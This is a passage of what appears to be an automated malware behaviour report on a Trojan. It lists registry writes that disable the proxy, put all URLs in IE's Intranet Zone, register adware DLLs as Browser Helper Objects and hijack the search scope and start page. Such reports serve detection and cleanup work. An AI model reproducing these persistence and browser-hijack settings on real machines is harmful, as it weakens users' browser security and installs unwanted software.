"a47da861" = "o01O07x0m00K02E0aU1e0700m01 0640ml1e06I0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1e0700m01e0780px0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06t0i01A0780px1 02I0nU1M06m0aU1P06I0ox1S07b0i01e06U0n00T00%%, o01O07x0m00K02E0aU1Y06h0ql1M0640ml1J07b0qx1A06t0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1g06E0nx0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1N07t0oU1N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1Z0640n01Y02I0nl1 07x0aU1P06I0ox1S07b0i01e06U0n00T00%%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"date" = "1435726441"
[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610]
"Version" = "22022148"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"d1abcdb6" = "///%"
"f2c53c49" = "UlAr/XJ/c//k////"
[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"340d3099" = "/P////%%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"fe94ce1e" = "V/////%%"
"0dc3ee96" = "/P////%%"
"48bd1aff" = "V/////%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"2d71d5ab" = "V/////%%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"1520c6f1" = "V/////%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"svpath" = "c:\Program Files\TerminusKeeper\TerminusKeeper.dll"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\00000000]
"493c7345" = "i01 06b0o01D06I0px0S06I0px1O00%%, pl1e06b0i01T0780jx1B06E0nU1h02I0nl1 07x0"
[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"d94388d2" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The Trojan deletes the following registry key(s):
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process rundll32.exe:1256 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "10 9A 19 6B 14 21 9D F0 2C 4E 39 6F 44 CC 42 F8"
The process rundll32.exe:1016 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"d1abcdb6" = "///%"
"0e93c3f3" = "///%"
"f6ad6fa6" = "V/////%%"
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\00000000]
"3efeb33e" = ""
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"a0743acc" = "N/////%%"
"8b9e4cbc" = "V/////%%"
"1520c6f1" = "V/////%%"
"a1dcff5b" = "V/////%%"
"6185d035" = "Vx/2/Cx/V//l////"
"c5705860" = "Vx////%%"
"37b7a6d8" = "UlAr/XJ/c//k////"
"72758a5d" = "///%"
"38583bc3" = "Ml/2/CF/M//g/CZ////%"
"bbf88800" = "///%"
"0dc3ee96" = "/P////%%"
"fe94ce1e" = "V/////%%"
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\00000000]
"a47da861" = "o01O07x0m00K02E0aU1e0700m01 0640ml1e06I0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1e0700m01e0780px0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06t0i01A0780px1 02I0nU1M06m0aU1P06I0ox1S07b0i01e06U0n00T00%%, o01O07x0m00K02E0aU1Y06h0ql1M0640ml1J07b0qx1A06t0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1g06E0nx0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1N07t0oU1N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1Z0640n01Y02I0nl1 07x0aU1P06I0ox1S07b0i01e06U0n00T00%%"
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"7367429f" = "///%"
"c99a5f5c" = "///%"
"f1f24e29" = "Vl/l/C/////%"
"3c09c42b" = "///%"
"c24899a6" = "VP/g/CV/Vl/2/Cx////%"
"060df2cd" = "c/Au/XV/H/Ap/X2/GP/j/Xt/axAv/X6////%"
"0c230bcb" = "///%"
"a2e3b941" = "///%"
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"iiid" = "1"
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"2d71d5ab" = "V/////%%"
"c6c5dd44" = "V/////%%"
"414bc593" = "///%"
"7f69fa1f" = "///%"
"65114b36" = "Vl/l////"
"d94388d2" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1B D3 B0 25 F0 93 DA AB 73 E7 2D CE 9D BC 27 85"
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"27ddcf6f" = "///%"
"51d2f2ea" = "IxA3/XZ/FxAm/XJ/PlAf/XD/clAm/XJ/bx////%%"
"f2c53c49" = "UlAr/XJ/c//k////"
"e46c271e" = "///%"
"2e22d94e" = "///%"
"1c311243" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"
"e8f9dcc7" = "UlAr/XJ/c//k////"
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\00000000]
"493c7345" = "i01 06b0o01D06I0px0S06I0px1O00%%, pl1e06b0i01T0780jx1B06E0nU1h02I0nl1 07x0"
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"340d3099" = "/P////%%"
"f0bf0bde" = "///%"
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\00000000]
"370856c7" = ""
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"587b5709" = "V/////%%"
"48bd1aff" = "V/////%%"
The process regsvr32.exe:2008 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "87 87 45 DC 73 D5 F7 A8 24 75 D3 12 8E C9 97 9B"
[HKCR\TypeLib\{330ED369-73D2-49BC-AC43-1E21602F742D}\1.0\0\win32]
"(Default)" = "%Program Files%\bestadblocker\tEp7pMPAVoxXWr.tlb"
[HKCR\CLSID\{1794EDF4-AB72-4097-9564-4E9260F483B4}\VersionIndependentProgID]
"(Default)" = "P1794EDF4_AB72_4097_9564_4E9260F483B4_"
[HKCR\P1794EDF4_AB72_4097_9564_4E9260F483B4_.P1794EDF4_AB72_4097_9564_4E9260F483B4_\CurVer]
"(Default)" = "P1794EDF4_AB72_4097_9564_4E9260F483B4_.9"
[HKCR\P1794EDF4_AB72_4097_9564_4E9260F483B4_.P1794EDF4_AB72_4097_9564_4E9260F483B4_.9\CLSID]
"(Default)" = "{1794EDF4-AB72-4097-9564-4E9260F483B4}"
[HKCR\CLSID\{1794EDF4-AB72-4097-9564-4E9260F483B4}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{1794EDF4-AB72-4097-9564-4E9260F483B4}]
"(Default)" = ""
[HKCR\CLSID\{1794EDF4-AB72-4097-9564-4E9260F483B4}\InprocServer32]
"(Default)" = "%Program Files%\bestadblocker\tEp7pMPAVoxXWr.dll"
[HKCR\CLSID\{1794EDF4-AB72-4097-9564-4E9260F483B4}\ProgID]
"(Default)" = "P1794EDF4_AB72_4097_9564_4E9260F483B4_.9"
[HKCR\CLSID\{1794EDF4-AB72-4097-9564-4E9260F483B4}]
"(Default)" = "bestadblocker"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ext\CLSID]
"{1794EDF4-AB72-4097-9564-4E9260F483B4}" = "1"
[HKCR\CLSID\{1794EDF4-AB72-4097-9564-4E9260F483B4}\Programmable]
"(Default)" = ""
[HKCR\P1794EDF4_AB72_4097_9564_4E9260F483B4_.P1794EDF4_AB72_4097_9564_4E9260F483B4_]
"(Default)" = "bestadblocker"
[HKCR\P1794EDF4_AB72_4097_9564_4E9260F483B4_.P1794EDF4_AB72_4097_9564_4E9260F483B4_\CLSID]
"(Default)" = "{1794EDF4-AB72-4097-9564-4E9260F483B4}"
[HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration\{1794EDF4-AB72-4097-9564-4E9260F483B4}]
"(Default)" = ""
[HKCR\P1794EDF4_AB72_4097_9564_4E9260F483B4_.P1794EDF4_AB72_4097_9564_4E9260F483B4_.9]
"(Default)" = "bestadblocker"
It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1794EDF4-AB72-4097-9564-4E9260F483B4}]
"(Default)" = "bestadblocker"
"NoExplorer" = "1"
The process regsvr32.exe:1784 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCR\Interface\{9F5974D4-08A9-4422-9F36-76103BEE67A1}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration\{296EA12C-9126-48AA-AC11-7ECC0463D2B2}]
"(Default)" = ""
[HKCR\TypeLib\{330ED369-73D2-49BC-AC43-1E21602F742D}\1.0]
"(Default)" = "IEPluginLib"
[HKCR\Interface\{B0030E0C-349C-4EB5-AD5E-847B43C0D844}\TypeLib]
"(Default)" = "{330ED369-73D2-49BC-AC43-1E21602F742D}"
[HKCR\Interface\{3967CDA8-3EAB-4115-84F1-C29A9C5FB484}]
"(Default)" = "IRuntime"
[HKCR\Interface\{B0030E0C-349C-4EB5-AD5E-847B43C0D844}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{296EA12C-9126-48AA-AC11-7ECC0463D2B2}\Programmable]
"(Default)" = ""
[HKCR\Interface\{0B079ECD-60E4-40B9-9FAC-4ECC98AB8786}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\P296EA12C_9126_48AA_AC11_7ECC0463D2B2_.P296EA12C_9126_48AA_AC11_7ECC0463D2B2_.9\CLSID]
"(Default)" = "{296EA12C-9126-48AA-AC11-7ECC0463D2B2}"
[HKCR\Interface\{B0030E0C-349C-4EB5-AD5E-847B43C0D844}\TypeLib]
"Version" = "1.0"
[HKCR\CLSID\{296EA12C-9126-48AA-AC11-7ECC0463D2B2}\InprocServer32]
"(Default)" = "%Program Files%\CutThePrIcE\F9Kz7xj8t8M4Vo.dll"
[HKCR\Interface\{0B079ECD-60E4-40B9-9FAC-4ECC98AB8786}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{9F5974D4-08A9-4422-9F36-76103BEE67A1}\TypeLib]
"Version" = "1.0"
[HKCR\TypeLib\{330ED369-73D2-49BC-AC43-1E21602F742D}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\Interface\{0B079ECD-60E4-40B9-9FAC-4ECC98AB8786}\TypeLib]
"(Default)" = "{330ED369-73D2-49BC-AC43-1E21602F742D}"
[HKCR\Interface\{0B079ECD-60E4-40B9-9FAC-4ECC98AB8786}]
"(Default)" = "IPlaghinMein"
[HKCR\Interface\{0B079ECD-60E4-40B9-9FAC-4ECC98AB8786}\TypeLib]
"Version" = "1.0"
[HKCR\P296EA12C_9126_48AA_AC11_7ECC0463D2B2_.P296EA12C_9126_48AA_AC11_7ECC0463D2B2_\CurVer]
"(Default)" = "P296EA12C_9126_48AA_AC11_7ECC0463D2B2_.9"
[HKCR\Interface\{3967CDA8-3EAB-4115-84F1-C29A9C5FB484}\TypeLib]
"Version" = "1.0"
[HKCR\Interface\{9F5974D4-08A9-4422-9F36-76103BEE67A1}]
"(Default)" = "IRegistry"
[HKCR\Interface\{3967CDA8-3EAB-4115-84F1-C29A9C5FB484}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{296EA12C-9126-48AA-AC11-7ECC0463D2B2}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ext\CLSID]
"{296EA12C-9126-48AA-AC11-7ECC0463D2B2}" = "1"
[HKCR\P296EA12C_9126_48AA_AC11_7ECC0463D2B2_.P296EA12C_9126_48AA_AC11_7ECC0463D2B2_]
"(Default)" = "CutThePrIcE"
[HKCR\Interface\{3967CDA8-3EAB-4115-84F1-C29A9C5FB484}\TypeLib]
"(Default)" = "{330ED369-73D2-49BC-AC43-1E21602F742D}"
[HKCR\CLSID\{296EA12C-9126-48AA-AC11-7ECC0463D2B2}]
"(Default)" = "CutThePrIcE"
[HKCR\TypeLib\{330ED369-73D2-49BC-AC43-1E21602F742D}\1.0\HELPDIR]
"(Default)" = "%Program Files%\CutThePrIcE"
[HKCR\Interface\{9F5974D4-08A9-4422-9F36-76103BEE67A1}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{296EA12C-9126-48AA-AC11-7ECC0463D2B2}]
"(Default)" = ""
[HKCR\Interface\{B0030E0C-349C-4EB5-AD5E-847B43C0D844}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{3967CDA8-3EAB-4115-84F1-C29A9C5FB484}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\P296EA12C_9126_48AA_AC11_7ECC0463D2B2_.P296EA12C_9126_48AA_AC11_7ECC0463D2B2_\CLSID]
"(Default)" = "{296EA12C-9126-48AA-AC11-7ECC0463D2B2}"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0D 9A 22 EF 01 B1 0F C1 82 2F BE 83 3A ED 10 D2"
[HKCR\CLSID\{296EA12C-9126-48AA-AC11-7ECC0463D2B2}\ProgID]
"(Default)" = "P296EA12C_9126_48AA_AC11_7ECC0463D2B2_.9"
[HKCR\CLSID\{296EA12C-9126-48AA-AC11-7ECC0463D2B2}\VersionIndependentProgID]
"(Default)" = "P296EA12C_9126_48AA_AC11_7ECC0463D2B2_"
[HKCR\Interface\{B0030E0C-349C-4EB5-AD5E-847B43C0D844}]
"(Default)" = "ILocalStorage"
[HKCR\P296EA12C_9126_48AA_AC11_7ECC0463D2B2_.P296EA12C_9126_48AA_AC11_7ECC0463D2B2_.9]
"(Default)" = "CutThePrIcE"
[HKCR\TypeLib\{330ED369-73D2-49BC-AC43-1E21602F742D}\1.0\0\win32]
"(Default)" = "%Program Files%\CutThePrIcE\F9Kz7xj8t8M4Vo.tlb"
[HKCR\Interface\{9F5974D4-08A9-4422-9F36-76103BEE67A1}\TypeLib]
"(Default)" = "{330ED369-73D2-49BC-AC43-1E21602F742D}"
It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{296EA12C-9126-48AA-AC11-7ECC0463D2B2}]
"(Default)" = "CutThePrIcE"
"NoExplorer" = "1"
The process hpds_setup.exe:164 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\2038a74d]
"b2cc84ee" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/Ul/9/Xl/OP/e/BF/bP/7/Ym/blAu/XD/bxAs/Xx/K/Au/YZ/aPAg/Yh/SxAl/Xt/G//7/CZ/M//g/Cb/NP/v/YZ/OP/f/C//VP/ /B6/V//1/B6/V//e/BF/H/Ap/XP/OP/2/Cb/Vl/2/CJ/Vl/f/CJ/Ml/2/CF/NP/ /Cx/MP/e/CF/NP/e/BF/a/Ar/Ch/QPAN/BF/FlAs/Ch/KPAA////"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope" = "{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}"
[HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\2038a74d]
"51652492" = "///%"
"05502537" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/UlAv/XD/cxAp/XV/alAj/B2/HPAs/X6////%"
[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\2038a74d]
"81339df5" = "H/Ah/YP/b//4/B6/UlAm/X6/FlAy/Xl/H/Ak/YV/c/////%%"
[HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\7fe0f877]
"b2cc84ee" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/Ul/9/Xl/OP/e/BF/bP/7/Ym/blAu/XD/bxAs/Xx/K/Au/YZ/aPAg/Yh/SxAl/Xt/G//7/CZ/M//g/Cb/NP/v/YZ/OP/f/C//VP/ /B6/V//1/B6/V//e/BF/H/Ap/XP/OP/2/Cb/Vl/2/CJ/Vl/f/CJ/Ml/2/CF/NP/ /Cx/MP/e/CF/NP/e/BF/a/Ar/Ch/QPAN/BF/FlAs/Ch/KPAA////"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}]
"FaviconURL" = "websearch.coolfindings.info/favicon.ico"
[HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\2038a74d]
"b2cc84ee" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/Ul/9/Xl/OP/e/BF/bP/7/Ym/blAu/XD/bxAs/Xx/K/Au/YZ/aPAg/Yh/SxAl/Xt/G//7/CZ/M//g/Cb/NP/v/YZ/OP/f/C//VP/ /B6/V//1/B6/V//e/BF/H/Ap/XP/OP/2/Cb/Vl/2/CJ/Vl/f/CJ/Ml/2/CF/NP/ /Cx/MP/e/CF/NP/e/BF/a/Ar/Ch/QPAN/BF/FlAs/Ch/KPAA////"
"81339df5" = "H/Ah/YP/b//4/B6/UlAm/X6/FlAy/Xl/H/Ak/YV/c/////%%"
[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\0caebbe2]
"fd0dde78" = "KlAu/XZ/JlAu/XD/bxAs/Xx////%"
[HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\2038a74d]
"f176879d" = "GxAy/Xl/blAu////"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}]
"DisplayName" = "WebSearch"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}]
"Deleted" = "0"
[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\2038a74d]
"94362f76" = "KlAu/XZ/JlAu/XD/bxAs/Xx////%"
[HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\0caebbe2]
"d7cea243" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/Ul/9/Y//HPAt/Ch/Vx/h/CV/Ml/3/BF/bx/7/CZ/V//e/CJ/Ul/l/Cb/Ul/l/CD/SxAq/Xt/G//7/Cx/Ml/g/Cx/MP/g/CZ/MP/1/Cx/Mx/3/CJ/N// /CD/Mx/3/CD/SxAm/Xb/OPAW/D2/SxAs/XV/OPAK/DD////%"
[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\7fe0f877]
"05502537" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/UlAv/XD/cxAp/XV/alAj/B2/HPAs/X6////%"
[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\2038a74d]
"64fc053d" = "M/////%%"
[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\7fe0f877]
"b2cc84ee" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/Ul/9/Xl/OP/e/BF/bP/7/Ym/blAu/XD/bxAs/Xx/K/Au/YZ/aPAg/Yh/SxAl/Xt/G//7/CZ/M//g/Cb/NP/v/YZ/OP/f/C//VP/ /B6/V//1/B6/V//e/BF/H/Ap/XP/OP/2/Cb/Vl/2/CJ/Vl/f/CJ/Ml/2/CF/NP/ /Cx/MP/e/CF/NP/e/BF/a/Ar/Ch/QPAN/BF/FlAs/Ch/KPAA////"
[HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\0caebbe2]
"94362f76" = "KlAu/XZ/JlAu/XD/bxAs/Xx////%"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}]
"Deleted" = "0"
"FaviconURL" = "websearch.coolfindings.info/favicon.ico"
[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\7fe0f877]
"fd0dde78" = "dlAB/DZ/Ml/h/DP/QP/ /Ct/UPAB/DV/M/AC/Bh/M//e/Cb/Vx/i/Ct/PPAC/CP/UP/1/CV/Vl/e/CJ/Qx/1/CD/PlAX/DF/QPA7////"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}]
"FaviconURLFallback" = "websearch.coolfindings.info/favicon.ico"
[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\2038a74d]
"ef34a9f6" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/Ul/9/Y//HPAt/Ch/Vx/h/CV/Ml/3/BF/bx/7/CZ/V//e/CJ/Ul/l/Cb/Ul/l/CD/SxAq/Xt/G//7/Cx/Ml/g/Cx/MP/g/CZ/MP/1/Cx/Mx/3/CJ/N// /CD/Mx/3/CD/SxAm/Xb/OPAW/D2/SxAs/XV/OPAK/DD////%"
[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\0caebbe2]
"b2cc84ee" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/Ul/9/Y//HPAt/Ch/Vx/h/CV/Ml/3/BF/bx/7/CZ/V//e/CJ/Ul/l/Cb/Ul/l/CD/SxAq/Xt/G//7/Cx/Ml/g/Cx/MP/g/CZ/MP/1/Cx/Mx/3/CJ/N// /CD/Mx/3/CD/SxAm/Xb/OPAW/D2/SxAs/XV/OPAK/DD/SxAm/Ch/VP/v/YD/OP////%%"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main]
"Start Page" = "websearch.coolfindings.info/?pid=24379&r=2015/07/01&hid=8738532578695851691&lg=EN&cc=UA"
[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\2038a74d]
"f176879d" = "GxAy/Xl/blAu////"
[HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\2038a74d]
"64fc053d" = "M/////%%"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}]
"FaviconURLFallback" = "websearch.coolfindings.info/favicon.ico"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}]
"DisplayName" = "WebSearch"
[HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\7fe0f877]
"05502537" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/UlAv/XD/cxAp/XV/alAj/B2/HPAs/X6////%"
[HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\0caebbe2]
"fd0dde78" = "KlAu/XZ/JlAu/XD/bxAs/Xx////%"
[HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\2038a74d]
"d7cea243" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/Ul/9/Y//HPAt/Ch/Vx/h/CV/Ml/3/BF/bx/7/CZ/V//e/CJ/Ul/l/Cb/Ul/l/CD/SxAq/Xt/G//7/Cx/Ml/g/Cx/MP/g/CZ/MP/1/Cx/Mx/3/CJ/N// /CD/Mx/3/CD/SxAm/Xb/OPAW/D2/SxAs/XV/OPAK/DD////%"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes]
